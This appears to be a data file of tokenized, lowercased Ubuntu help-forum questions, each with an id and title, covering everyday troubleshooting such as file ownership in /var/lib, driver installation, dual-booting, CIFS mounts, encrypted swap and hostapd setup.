302246	12.04 /var directory default user : group ownership	i 'm pretty sure i recursively messed up the default /var user : group ownerships . i 've tried to restore them to the best of my ability by searching . specifically , i 'm worried about /var/lib . currently , mine looks like the below . if there 's a kind soul out there who would please post their /var/lib so i can see if i 'm missing something . drwxr-xr-x 4 root root 4096 jul 3 2012 accountsservice drwxr-xr-x 2 root root 4096 mar 13 2012 acpi-support drwxr-xr-x 2 root root 4096 nov 13 2011 alien drwxr-xr-x 2 root root 4096 apr 30 01:14 alsa drwxr-xr-x 6 root root 4096 may 30 17:23 apt drwxr-xr-x 2 root root 4096 may 30 07:36 apt-xapian-index drwxr-xr-x 2 root root 4096 jul 3 2012 aspell drwxr-xr-x 2 avahi-autoipd avahi-autoipd 4096 jul 3 2012 avahi-autoipd drwxr-xr-x 2 root root 4096 apr 30 01:13 belocs drwxr-xr-x 2 root root 4096 may 8 08:42 binfmts drwxr-xr-x 5 boinc boinc 4096 may 7 01:27 boinc-client drwxr-xr-x 2 colord colord 4096 apr 30 00:23 colord drwxr-xr-x 2 root root 4096 apr 30 00:23 dbus drwxr-xr-x 3 root root 4096 jul 3 2012 dell-recovery drwxr-xr-x 2 root root 4096 may 13 19:01 dhcp drwxr-xr-x 5 root root 4096 apr 30 00:19 dictionaries-common drwxr-xr-x 4 root root 4096 may 30 17:05 dkms drwxr-xr-x 5 root root 4096 jul 3 2012 doc-base drwxr-xr-x 7 root root 4096 may 30 17:23 dpkg drwxr-xr-x 7 root root 4096 jul 3 2012 gconf drwxr-xr-x 4 root root 4096 jul 3 2012 ghostscript drwxr-xr-x 2 root root 4096 apr 30 01:06 hp drwxr-xr-x 2 root root 4096 may 30 17:23 initramfs-tools drwxr-xr-x 2 root root 4096 apr 14 2012 initscripts drwxr-xr-x 2 root root 4096 apr 14 2012 insserv drwxr-xr-x 2 root root 4096 may 12 01:50 iptraf drwxr-xr-x 3 root root 4096 jul 3 2012 libreoffice drwxrwsr-x 2 libuuid libuuid 4096 jul 3 2012 libuuid drwxr-x -- - 10 lightdm lightdm 4096 may 30 17:51 lightdm drwxr-xr-x 2 root root 4096 apr 30 00:31 localechooser drwxr-xr-x 3 root root 4096 jul 3 2012 locales drwxr-xr-x 2 root root 4096 may 30 07:36 logrotate drwxr-xr-x 2 root root 4096 oct 23 2012 lsb drwxr-xr-x 2 root root 4096 apr 19 2012 misc drwxr-xr-x 2 root root 4096 may 30 07:36 mlocate drwx -- -- -- 6 mysql mysql 4096 may 30 17:51 mysql drwxr-xr-x 2 root root 4096 may 30 17:51 networkmanager drwxr-xr-x 2 root root 4096 mar 6 2012 ntpdate drwxr-xr-x 2 root root 4096 apr 30 01:03 nvidia-common drwxr-xr-x 2 root root 4096 may 30 17:23 os-prober drwxr-xr-x 2 root root 4096 may 8 08:42 pam drwx-wx-wt 2 root root 4096 mar 11 07:44 php5 drwxr-xr-x 3 root root 4096 may 7 19:20 phpmyadmin drwxr-xr-x 2 root root 4096 apr 30 00:23 plymouth drwx -- -- -- 3 root root 4096 jul 3 2012 polkit-1 drwxr-xr-x 2 pulse pulse 4096 may 31 2012 pulseaudio drwxr-xr-x 2 root root 4096 apr 30 11:30 pycentral lrwxrwxrwx 1 root root 18 apr 30 00:19 python-support - > /usr/lib/pymodules drwxr-xr-x 2 root root 4096 apr 30 00:32 register-module drwxr-xr-x 2 root root 4096 apr 30 01:14 rfkill drwxr-xr-x 2 root root 4096 jan 17 09:56 rpm drwxr-xr-x 2 root root 4096 jun 8 2012 samba drwxr-xr-x 2 root root 4096 jul 3 2012 sgml-base drwxr-xr-x 2 root root 4096 may 22 2012 snmp drwx -- -- -- 3 root root 4096 jan 1 1985 sudo drwxr-xr-x 2 root root 4096 apr 17 2012 synaptic drwxr-xr-x 2 root root 4096 apr 30 00:32 ubiquity -rw-r -- r -- 1 root root 174 jul 3 2012 ubuntu_dist_channel drwxr-xr-x 3 root root 4096 may 22 18:48 ucf drwxr-xr-x 2 root root 4096 may 30 17:52 udisks drwxr-xr-x 2 root root 4096 apr 30 00:58 update-manager drwxr-xr-x 4 root root 4096 apr 30 00:58 update-notifier drwxr-xr-x 2 root root 4096 may 23 18:02 update-rc.d drwxr-xr-x 2 root root 4096 may 21 18:44 upower drwxr-xr-x 2 root root 4096 may 30 17:51 urandom drwxr-xr-x 3 root root 4096 may 30 17:26 ureadahead drwxr-xr-x 2 root root 4096 mar 7 2012 usb_modeswitch drwxr-xr-x 2 root root 4096 jul 3 2012 usbutils drwxr-xr-x 3 root root 4096 jul 3 2012 vim drwxr-xr-x 2 root root 4096 jul 3 2012 xfonts drwxr-xr-x 2 root root 4096 apr 30 01:37 xkb drwxr-xr-x 2 root root 4096 apr 30 18:42 xml-core
302248	change language of installation dvd	i have downloaded ubuntu and burned the iso to dvd . when the disk opens , it is in dutch ( i think ) and does n't seem to have any options for changing to english . i tried installing it via windows xp add program ( control panel ) but ca n't find a setup file . i tried booting from the dvd , but my acer aspire one does n't seem to like that . it runs on a crucial 256gb ssd and the start-up screen only lasts for a fraction of a second , meaning i ca n't press the f2 at the 'crucial ' moment ! any ideas ?
302251	changing how pirate bay scope opens results	i honestly do n't entirely know what i am doing but i am trying to make the pirate bay scope open its results with acestream player . one of the problems being acestream does n't know how to handle magnetic links . the original code is : def on_activate_uri ( self , scope , uri ) : if uri.startswith ( `` more '' ) : results = self.scope.props.results_model page = uri.split ( '__ ' ) [ 2 ] search = uri.split ( '__ ' ) [ 1 ] results.remove ( results.get_iter_at_row ( results.get_n_rows ( ) -1 ) ) self.update_results_model ( search , results , page ) return unity.activationresponse ( handled=unity.handledtype.show_dash , goto_uri= '' '' ) else : print uri glib.spawn_command_line_async ( 'gvfs-open % s ' % uri ) return unity.activationresponse ( handled=unity.handledtype.hide_dash , goto_uri= '' ) i have modified one line so it is : glib.spawn_command_line_async ( 'aria2c -d ~/.torrents -- on-download-complete ~/.torrent.sh -- bt-metadata-only=true -- bt-save-metadata=true \ ' % s\ '' % uri ) i am using aria2c to connect to the magnetic link and download a torrent file , and once the file has been downloaded aria2c runs a bash script which opens the torrent file with acestream . this process works fine on the command line . i am guessing my syntax is wrong . any help is greatly appreciated . thank you
302252	best ui that still makes good use of super button	this might be a weird question , but i 'm looking for the best ui that still makes use of something similar to unity 's search function . here 's the deal ; i installed lubuntu on a computer at work . it runs super fast , and i really like the layout and usability . what i do n't like is that i ca n't find any programs that i normally use ! for example , today i was trying to find the volume control because someone had put it on mute . i could n't find it in the menu , so i had to right click and add the little widget to the bottom right corner of my screen to unmute it . so , i 'm asking for a ui that will still allow me to search for programs and files in the same way that unity does ... but without using unity .
302253	moving a wubi install to a different windows 'drive '	i was wanting to move my wubi install from drive e : to c : as to have a working backup location that is not on the drive which i will be migrating to a regular install . ( i want to make the e : drive a linux partition . ) i read moved ubuntu folder from c : to d : drive how to correct uuid entries and how to convert wubi install into regular install ? for migration at another time . and , i tried to figure out were my grub.cfg file is . the only thing i found was an empty grub directory , and did the following . by going into windows renaming the ubuntu folder to ubuntu-test and tried to reboot into ubuntu . what i got was an error message with a file : \ubuntu\winboot\wubildr.mbr with the status : 0xc000000f . i rebooted again and went back to windows and renamed the folder back to ubuntu . back to the same ubuntu with all of my settings and configurations . i also copied all the files and folders in e : \ubuntu to c : \ubuntu before this renaming and un-renaming above . so the question is : what do need to do in order to move this to c : ?
302256	binary-i386/packages file not found , maybe another variation	an upgrade from lucid to precise went horribly wrong and it apparently tried to install part of an i386 arch on an amd64 machine . too much to manually fix , so refreshed with a precise amd64 dist . luckily install was on separate partition and all config and /home were saved so i could restore it and nothing lost . except for this issue all working fine for the past month , including new installs and updates . but from apt-get update we still have : /var/cache/apt-build/repository/dists/apt-build/main/binary-i386/packages file not found . no partials found . in all /etc/apt files the only binary-i386 entries are already commented out . all the apt-get cleaning variations have been tried ( i think ... ) . what is flagging apt-get to look for these files ? nothing found anywhere , so after reading all the man and how-to 's i looked for something referencing main or dist , instead of i386 . in /etc/apt/sources.list.d/apt-build.list i found : deb file : /var/cache/apt-build/respository apt-build main and could not find any reason that should be there . as that was the only entry , i deleted that file . problem is now solved .
302259	have i over-installed mysql ?	i ran the following from the terminal : sudo apt-get install mysql-server mysql-client i then checked to see if mysql was running : sudo netstat -tap | grep mysql i saw something similar to this : tcp 0 0 localhost : mysql : listen 2556/mysqld i knew i also needed the mysql workbench , so i went to the software center and downloaded the workbench . when i checked to see if mysql was running , i saw the following $ sudo netstat -tap | grep mysql tcp 0 0 localhost : mysql * : * listen 1003/mysqld tcp 0 0 localhost:52515 localhost : mysql established 3167/mysql-workbenc tcp 0 0 localhost : mysql localhost:52514 time_wait - tcp 0 0 localhost : mysql localhost:52516 established 1003/mysqld tcp 0 0 localhost:52516 localhost : mysql established 3167/mysql-workbenc tcp 0 0 localhost : mysql localhost:52515 established 1003/mysqld my question is , have i over-installed some portion of mysql ? i just want to take care of what i need to , prior to going into some more development .
302260	black screen while connecting windows server 2012 through remmina	i am getting black screen when i try to connect windows server 2012 from remmina , while this remmina can connect windows server 2008 r2 and other ubuntu servers . i have also cross checked that windows server 2012 can be opened by another windows 7 host through remote desktop .
302261	understanding contents of firefox cookie in ubuntu	recently , i moved to ubuntu from wdoz and working on firefox . i understand that using firefox developer toolbar , i can look into various cookies that websites put on my computer . but , i can not figure out how to understand them ? what are the information that are stored and transmitted to the servers ? for example , if i am on youtube , there are some keys and values . some of them , like key `` recent ply list '' , are understandable but not all . how do i know what exact information , for example , youtube is getting from cookies ? and , of course , it would be great if i can get some ubuntu-specific solutions . thanks
302262	getting superuser permissions when i 'm on an `` administrator '' account	i 'm trying to install the java plugin for mozilla . i have followed the instructions on the java website , but when i try to create the link to the mozilla directory , i get 'permission denied ' . i 'm logged on as the administrator . is there a command i need to enter to act as administrator in terminal ? i 'm running 12.04 lts
302263	selecting text in the terminal without using the mouse	i am about to press enter to run a command in terminal , but before doing that , i want to copy the command to clipboard without using the mouse . how ? if you 're somewhere other than the terminal , ctrl+home does it . is there a way of arbitrarily selecting text like that in the terminal ? edited : assume that using other programs like screen is not a good alternative the text is to be pasted outside the terminal , so ctrl+y and similar sequences do not solve it either
302268	ubuntu crashes after updating nvidia card	i installed the nvidia gt 520m using the following commands : sudo apt-get update sudo apt-get upgrade sudo apt-get install nvidia-current and then i restarted my computer and it logs in fine , however there is no menu bar , no side menu or anything , just my desktop . i can open folders on my desktop , however i can not close these . i can open the terminal . here is an what my screen looks like ( i can take screen shots ) this is my whole screen . what do i do to get the gui functioning properly again ? also , i am running ubuntu 13.04
302274	i have recently installed ubuntu after i erased my hdd and i dont know if the hdd has only one partition now	i am new to ubuntu ( coming from windows ) , and i do n't know if the install went right : i understand that by default there should be 2 partitions after the install so i run this command sudo fdisk -l and this is the output : disk /dev/sdb : 159.9 gb , 159905567744 bytes 255 heads , 63 sectors/track , 19440 cylinders , total 312315562 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b9862 device boot start end blocks id system /dev/sdb1 * 2048 499711 248832 83 linux /dev/sdb2 501758 312313855 155906049 5 extended /dev/sdb5 501760 312313855 155906048 83 linux disk /dev/mapper/sda5_crypt : 159.6 gb , 159645696000 bytes 255 heads , 63 sectors/track , 19409 cylinders , total 311808000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda5_crypt does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-root : 157.4 gb , 157449977856 bytes 255 heads , 63 sectors/track , 19142 cylinders , total 307519488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 2143 mb , 2143289344 bytes 255 heads , 63 sectors/track , 260 cylinders , total 4186112 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/sda : 8032 mb , 8032092160 bytes 255 heads , 63 sectors/track , 976 cylinders , total 15687680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xefb71902 device boot start end blocks id system /dev/sda1 * 63 15687679 7843808+ c w95 fat32 ( lba ) can somebody tell me if something went wrong just by looking at this output ? i want to know if there are at least 2 partitions or i have to reinstall ubuntu .
302278	i have an emac g4 . what ubuntu software should i install on it ? and are there any space requirements ?	i have an apple emac g4 . what ubuntu software should i install on it ? and are there any space requirements ? i am a little new to the ubuntu world . i have friends who use ubuntu quantal quetzal on their laptops and i am wondering if i can install ubuntu on my old emac without any major problems because os x 10.4.11 is giving me several issues .
302280	ubuntu 12.04 wo n't load on windows 8 + dell inspiron 14z	i 've installed ubuntu from my windows 8 , using daemon tools to emulate the cd/dvd driver , and it appeared to be quite successful , but when i tried to reboot the computer , i got stuck on the uefi , with two options : windows 8 and ubuntu , only that ubuntu option wo n't work , it shows this error : file : \ubuntu\winboot\wubildr.mbr state : 0xc000007b and i 've got one extra serious problem : my cd/dvd driver is not working . ( and that 's why i had to emulate it from windows 8 , in order to install linux ) i can disable secure boot and prioritize stuff to boot , but it does not seem to work . any suggestion ?
302283	ubuntu installation for specific usage	i want to install a latest or optimum version of ubuntu as a dual boot with my windows 7 , 64-bit . i want to install ubuntu to run openfoam which is an open source cfd software . my computer specs are as follows , any advice is well appreciated . thanks . lenovo g460 windows 7 home premium ( x64 ) service pack 1 2.13 gigahertz intel core i3 m 330 installed ram : 4.00 gb ( 3.87 gb usable ) ddr3 nvidia geforce 310m [ display adapter ] dedicated video memory : 512 mb ddr3
302287	how to enable wireless on ubuntu 12.04 lts	i have had a wired connection for quite a while now , as my wireless is not activated . i have tried many commands and downloads to try and fix this . this problem occurred after downgrading from 13.04 which had wireless capabilities .
302289	error mounting disk image using guestmount	in trying to get qemubuilder to work , i 'm using guestmount to mount an image ( base-i386.qemu ) on a temporary directory ( /run/shm/qemu.3430 ) without needing root permissions . i am running ubuntu precise 32-bit . the disk image and empty temp folder already exist : user @ host : /scratch/qemubuilder $ file base-i386.qemu base-i386.qemu : linux rev 1.0 ext3 filesystem data , uuid=6d00c1e4-8b63-4bed-89d9-1a28b1dfd9ed ( large files ) following the examples , i tried running : user @ host : /scratch/qemubuilder $ guestmount -a base-i386.qemu -i /run/shm/qemu.3430/ warning : unable to get device geometry for /var/tmp/guestfs.4sxajv/root febootstrap-supermin-helper : ext2 : parent directory not found : /lib : file not found by ext2_lookup libguestfs : error : external command failed , see earlier error messages i get the same error if i manually create the image : user @ host : /scratch/qemubuilder $ dd if=/dev/null bs=1m seek=1024 of=testimg [ ... ] user @ host : /scratch/qemubuilder $ mkfs.ext4 testimg [ ... ] user @ host : /scratch/qemubuilder $ file testimg testimg : linux rev 1.0 ext4 filesystem data , uuid=47872462-214b-43ce-8a03-69c4c1572990 ( extents ) ( large files ) ( huge files ) user @ host : /scratch/qemubuilder $ guestmount -a testimg -i /run/shm/qemu.3430/ warning : unable to get device geometry for /var/tmp/guestfs.r1ukyw/root febootstrap-supermin-helper : ext2 : parent directory not found : /lib : file not found by ext2_lookup libguestfs : error : external command failed , see earlier error messages datbite @ shadow : /scratch/qemubuilder i see a bug that gave the same symptoms , but it is marked fixed with the versions i have . how can i mount my image ?
302290	having a script run constantly	i have both a ruby script and a qt executable . both of them pretty much accomplish same task but listen on different ports . basically , they are udp socket servers listening for incoming connections on a specified port on my remote ubuntu server . they listen for udp packets coming in from gsm modems of gps devices . now right now i can ssh into my remote server and run the ruby script to begin listening for connections to said port : `` ruby server.rb '' . but as soon as i log out and close the ssh connection , the script presumably stops listening . i want this script to continue listening for incoming connections on that port forever , even after i log out of server . for example : sudo netstat -tulpn tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 25391/mysqld that mysqld server listens constantly for incoming connections to port 3306 . i want my script to do the same thing . i want to be able to run netstat and always see my program running and listening on a specified port . what is the best approach to take in this situation ? create a daemon ? or use nohup ?
302292	the software center will open but will not respond	i am using 12.04 and have only recently started using ubuntu . i am very confused and would appreciate the help . thank you .
302293	how to customize vertical panel in cinnamon menu ?	i want to edit highlighted area : for example , change firefox with chromium or remove any item . menu editor can change only right part of menu , changing default application has no effect on this panel .
302295	locales and encoding	$ cat /etc/default/locale lang= '' ru_ua.utf-8 '' language= '' ru_ua : ru '' $ locale -a | grep ru_ua ru_ua.iso885915 ru_ua.utf8 ~ $ i want to have : $ cat /etc/default/locale lang= '' ru_ua.utf-8 '' language= '' ru_ua : ru '' $ locale -a | grep ru_ua ru_ua.iso885915 ru_ua.koi8r ru_ua.utf8 that is , i want to add one more encoding ru_ua.koi8r for the locale ru_ua . how do i bring the system to the form ? advice please !
302297	dns server - help with redirect traffic of a specific url to a local ip address	i 've been working on this problem for the past week and still ca n't solve it . i want to setup something probably a cname record or an a record that will help me with redirecting traffic from an external url to an internal ip address . i want all request for the following url : vc.example.com to be forwarded to a local ip address ( 10.8.8.5 ) . if the request for anything else that has the same domain , it will still go externally like : web.example.com . is this possible ? any assistance is appreciated . alee6179
302298	how to make a fresh install while also creating new partitions and keeping encrypted home directory	how can a machine be securely migrated from `` ubuntu - single partition - home directory encrypted '' to `` debian - separated partitions for os and home , and maybe for swap too if that is an advantage - with either encrypted home directory or full-disk encryption '' ? we have : * no free space available to make copies of the home directory for triangulation * triangulation through external hard drive possible but very undesirable * passwords do n't change i 'm not experienced with repartitioning or fiddling with encrypted homes , so i 'm worried about the order of things and dealing with all those problems at the same time . i 'm thinking first a backup of most important files , although it would n't be possible to back up everything , then a repartition is made by booting with a live cd , then new os is installed and then home is already encrypted in the separate partition , nothing to change . but i 'm not sure if this is correct , or if there areb't important details that could end up in data loss full-disk encryption is an improvement but i recall reading there 're still serious issues in the setup ( like risk of irreversible damages ) , so if this is not true , then fde is better , otherwise encrypted home directory is good enough , but in any of the two cases i 'm unsure how to proceed in a simple way .
302309	thinkpad x1 carbon palmdetect fail	we can see that w ( width of finger ) is always . do the palmdetect actually does not work . ubunto 12.10. synclient 1.6.2 : ~ $ synclient| grep palm palmdetect = 1 palmminwidth = 10 palmminz = 200 : ~ $ synclient -m 100 time x y z f w l r u d m multi gl gm gr gdx gdy 0.000 3823 3061 0 0 0 0 0 0 0 0 00000000 0.901 3769 2635 46 1 0 0 0 0 0 0 00000000 1.001 3740 2691 54 1 0 0 0 0 0 0 00000000 1.101 3667 2883 56 1 0 0 0 0 0 0 00000000 1.202 3574 2793 60 1 0 0 0 0 0 0 00000000 1.302 3723 2518 70 1 0 0 0 0 0 0 00000000 1.402 3761 2571 84 1 0 1 0 0 0 0 00000000 1.502 3767 2544 81 1 0 1 0 0 0 0 00000000 1.602 3762 2555 85 1 0 1 0 0 0 0 00000000 1.702 3759 2558 86 1 0 1 0 0 0 0 00000000 1.802 3759 2561 87 1 0 1 0 0 0 0 00000000 1.903 3728 2465 0 0 0 0 0 0 0 0 00000000
302310	how to check whether dhcp is enabled or not in ubuntu 12.04	how to check whether dhcp is enabled or not in ubuntu 12.04 ? is there any command for that
302313	installing v. 12.04.2 graphics card not recognized chrome9	i 've installed ubuntu 12.04.2 on my home pc which previously ran xp , this computer is n't a dual boot , i opted to remove windows . install seemed to go without a hitch until i went to reboot , computer froze with the cd still in the disc tray . i removed the disc and manually rebooted . unfortunately my graphics card is n't being recognized . through some internet searching i 've been able to find out the model of graphics card i have . by using : lshw -c display description : vga compatible controller product : k8m89oce/k8n89oce [ chrome9 ] vendor : via technologies , inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 11 width : 32 bits clock : 66mhz capabilities : vga_controller bus_master cap_list configuration : latency=64 mingnt=2 resources : memory : c0000000-cfffffff memory : dd000000-ddffffff memory : de000000-de00ffff i 've tried using : sudo apt-get install xserver-xorg-video-openchrome ..and it says : the following packages have unmet dependencies : xserver-xorg-video-openchrome : depends : xorg-video-abi-11 depends : xserver-xorg-core ( . 2:1.10.99.901 ) i 've also tried : sudo x :1 -configure and it says number of created screens does not match number of detected devices . configuration failed .
302316	auto mount ntfs drive with permissions of rwx for each user in ubuntu	i have a drive ( logical ) with ntfs system . i want it be mounted automatically whenever ubuntu starts . and since ntfs does n't support linux files ' permissions ( rwx ) i want it to be mounted with max permissions , meaning each user in ubuntu can run , read and execute every file in that ntfs drive . how do i do it ?
302318	what 's `` unity.layouthint '' intended for ?	i currently write my own lense in python ( ubuntu 13.4 ) using singlet . in the api documentation , there is a unity.layouthint ( view ) , which is used by unity.previewaction ( view ) . i do n't see any change if i use different values when constructing the unity.previewaction.with_layout_hint ( ... ) . so what is unity.layouthint intended for ?
302323	how is the duplicity url for deja-dup 's ubuntuone storage constructed ?	i 'm using deja-dup to store my backups from multiple systems to my ubuntuone subscription . i have setup weekly backups that should be keep at least 28 days . yet it seems that deja-dup will keep the backups longer . i wish i could configure deja-dup to run duplicity 's `` duplicity remove-all-but-n-full '' every time a backup completes with a configurable 'n ' . i was now going to write a cronjob to do that as a workaround . but that command needs a url probably with credentials . but i have no idea where to find the url for the ubuntuone storage . i have found some indication that scheme must be something like `` u1+https : //user @ some.server/some/path '' but i have no idea how to construct the url for my account and how to add the account credentials .
302324	encrypted swap no longer being activated at boot after removing and re-adding it	i have a ubuntu 13.04 system using encryption for / , /home , and swap . this used to work flawlessly , but then i needed to resize the swap partition . after doing that , and manually trying to set it up , the swap partition no longer gets activated at boot . i can however activate it by doing a : # cryptsetup luksopen /dev/sda6 sda_crypt # swapon -a after boot . i have a feeling that i am missing something like a commandline option for the kernel . does anyone have a hunch ? for completeness , here are my fstab and crypttab : # cat /etc/crypttab sda6_crypt uuid=dc259cc3-cb4a-44d2-8b1e-3636ef294b94 none luks , swap sdb5_crypt uuid=a8f5cfdd-a17c-448f-8ecf-24ba48d843c1 none luks sdb7_crypt uuid=bd50ceca-8bff-421d-b91a-783659fedca6 none luks # egrep -v '^ ( # | $ ) ' /etc/fstab /dev/mapper/sdb5_crypt / ext4 errors=remount-ro 0 1 uuid=04ad0dee-887f-400f-bf87-2086bd3e4cbf /backup ext4 defaults 0 2 uuid=06be7d34-7990-4dbe-9c29-e0fec9812149 /boot ext4 defaults 0 2 /dev/mapper/sdb7_crypt /home ext4 defaults 0 2 /dev/mapper/sda6_crypt none swap sw 0 0 # edit : i already tried `` update-initramfs -u -k all '' and `` dpkg-reconfigure grub-pc '' to resolve the problem - this did not help .
302327	vgaswitcheroo on macbook 8,2 : blank screen while switching from dis to igd	i followed this how-to to get vgaswitcheroo working on my macbook 8,2 : how to switch between gfx cards on macbook pro 15 '' 8.2 i can boot directly from refind ( bypassing grub ) ; and i get x working with the radeon and keyboard ok . but i am unable to switch : i get a blank screen when i use vgaswitcheroo to switch to igd . i can blindly switch back to dis , and it works which means the laptop is not frozen . any idea what causes that ? i use kernel 3.8.0-19 generic from ubuntu 13.04 . i also tried kernel vmlinuz-3.8.0-030800rc2-generic from the how-to bu no change . by the way , i had to modprobe i915 to see the file vgaswitcheroo/switch . is there anything else i have to do to get it work ? thanks
302328	load pidgin from the command line and join an irc channel	i would like to be able to add a function to my .bashrc or .profile file in ubuntu 13.04 that loads pidgin and automatically joins a given irc channel . is this possible ?
302331	laptop-mode-tools segfault , ca n't boot	i installed the laptop-mode-tools package . when the service starts ( term reads `` enabling laptop mode '' ) , a segmentation fault occurs . i ca n't boot the system now . i tried to remove the package from recovery mode , but the filesystem is mounted read-only , and selecting an option that would mount it for writing inits laptop-mode-tools and segfaults again . edit : i remounted / with rw , but running dpkg to remove the package also causes a segfault . nevermind getting the package to work , how can i recover the system ?
302340	is there a way to enable `` beats audio '' from within linux ?	i got hp pavilion dv6 7010ej , using beats audio , how can i enable full audio model support on it ( including subwoofer etc. ) ? sound card : lspci says : audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) . windows says : `` idt hd audio '' .
302345	is moving between attached monitor and native display possible from top ?	i have a laptop , connected to an external monitor which is situated right above the laptop . is it possible to push windows from the top instead from the side as you can do in mac ? reference : http : //apple.stackexchange.com/questions/3694/using-external-monitor-want-mouse-to-move-up-down-not-left-right would love this setting in ubuntu .
302346	pkg-config missing many pc files	i have been trying to compile gargoyle and keep getting the fallowing error . package fontconfig was not found in the pkg-config search path . perhaps you should add the directory containing `fontconfig.pc' to the pkg_config_path environment variable no package 'fontconfig ' found also for freetype2 , gdk-x11-2.0 , and gtk+-x11-2.0 . i could compile on 12.20 so i copied the files over and tried again . it complained about more files . why are so many of my libraries missing their pc files ? i have the -dev packages installed .
302351	how can i not require root identification for editing files in certain directories ?	i have the latest version of ubuntu installed on my computer . i would like to set it up so that i can comfortably program in php , javascript , html and css . so i 've installed nginx and set it up , mysql and set it up , i have an editor in place ( have n't decided between sublime text 2 or phpstorm 6 , but that 's outside the question at the moment ) , and it kinda works . my main problem is that i need to sudo anything in order to be able to edit or even access any of the configuration files , or even the public www files . that 's annoying as hell . i do n't want to keep terminal windows open for every program i need in order to develop . i know that there 's gksu but again , it 's annoying to have to identify for everything again and again . also , i ca n't install sublime-text plugins because of permission denied errors . again , i do n't want to sudo every time i use sublime ! it 's worth mentioning i 'm developing in gui , including running programs and whatnot . thanks in advance .
302353	how to make my computer accessible over the internet through a machine that does have a public ip address	i want to connect my laptop and another machine together using synergy . they are both on different networks , but i have successfully made a connection from my laptop to the desktop using an ssh tunnel through a publicly accessible machine on the desktop 's network ( laptop - > middle machine - > desktop ) . however , i would like to have the connection the other way round , desktop - > laptop . there is not a publicly accessible machine on my laptops network . can i run a command on my laptop which connects to the middle machine which opens a port tunnelling back to my laptop ? my laptop is running ubuntu , the other two machines are running centos . thank you
302357	`` permission denied '' error using dpkg-scanpackages and gzip	i 'm quite new to linux . i wanted to set up my own local apt-repository using instructions given here . however , when i execute the script as : # ! /bin/bash cd /var/www/debs/i386 dpkg-scanpackages . /dev/null | gzip -9c > packages.gz this script when executed as : sudo update-mydebs gives an error as : '' packages.gz : permission denied '' can anybody tell me , where the things are getting wrong ! thanks in advance .
302358	permission denied error	i am not able to change into a root user , problem is when i give the command root , it asks for password , but the keyboard does n't work after that though the enter key . after three strikes says `` three incorrect attempts '' . this is what it shows avinish @ ubuntu : ~ $ /etc/sudoers bash : /etc/sudoers : permission denied please help !
302361	ubuntu and windows 8 dualbooting	i 've downloaded and installed ubuntu , but it wo n't boot it . it keeps booting into windows 8 . i have been going through the advanced settings , shutdown/reboot thingy in windows 8 . i 've disabled all the things in the bios that i should . i 've run the boot-repair application but nothing helps ! please help !
302367	unmounted cifs still work . rmdir returns `` device or resource busy ''	i 've mounted a network folder in the mysql data folder using : mount -v -t cifs //192.168.1.xx/path/to/folder/data -o username=xxxxxxx , password=xxxxx , file_mode=0777 /mnt/storagehdd/mysql/data/netmnt all was fine but i was having problems setting write permissions for mysql so i umount-ed it to try other things , but it still works , has network files visible , and all changes affect the network folder . running mount shows that the mount is indeed removed . any advice ? update umount-ed again and it seems to have worked this time ? do n't get why ...
302370	skype does not use default ambiance theme	i have installed skype from canonical partner repository on my 64-bit ubuntu system . skype uses the cleanlooks theme instead of the default ambiance theme . how can i fix it ?
302380	hostapd wifi ap	i am trying to start wifi ap with hostapd , followed carefully all of this instructions . for now , from my phone , i see network , i connect to it , but it stucks at receiving ip address and then just terminates connection . hostapd-minimal.conf : interface=wlan0 driver=nl80211 ssid=test hw_mode=g channel=1 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=3 wpa_passphrase=88888888 wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp dhcpd.conf : ddns-update-style none ; # option definitions common to all supported networks ... # option domain-name `` example.org '' ; # option domain-name-servers ns1.example.org , ns2.example.org ; # default-lease-time 600 ; # max-lease-time 7200 ; log-facility local7 ; subnet 10.10.0.0 netmask 255.255.255.0 { range 10.10.0.2 10.10.0.16 ; option domain-name-servers 8.8.4.4 , 208.67.222.222 ; option routers 10.10.0.1 ; } interfaces : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 10.10.0.1 netmask 255.255.255.0 i launch it with this script : # ! /bin/bash sudo /bin/bash -c `` start isc-dhcp-server echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -a postrouting -s 10.10.0.0/16 -o eth0 -j masquerade hostapd $ home/hostapd-minimal.conf -b '' tried to run hostapt with -d debug option and all output is here - http : //pastebin.com/gcupiyrt what am i missing ?
302385	how to fix grub loader that hangs and waits for user with read only root partition ?	i am trying to create a set of ubuntu 12.04 slave systems that have a read only root partition and a small read/write partition mounted for a single user . these systems will be used for a short job processing and i do n't want anything to change except in that small read/write user space . we have successfully done this before and i have everything setup for version 12.04 but i am having some issues with the grub loader . if the root partition is marked as read-only in /etc/fstab the system does not automatically go past the grub loader . i can manually get past it by hitting enter but i do n't want to wait for the user prompt . if the root partition is setup as read/write it gets past the grub loader with no problem . the other weird thing on this is that it seems to be an issue only on the second and subsequent reboots to the system . i can change the partition to read-only and reboot once with no problem but on the second reboot it hangs at the grub loader prompt . how to fix the hanging grub loader that does n't wait for a user interaction at prompt ?
302387	trying to install vista over ubuntu	i get to the partitioning of the hardrives and it wont let me go forward as it says the drive is n't ntfs and i think it 's because ubuntu changed the drive format , how do i change it back
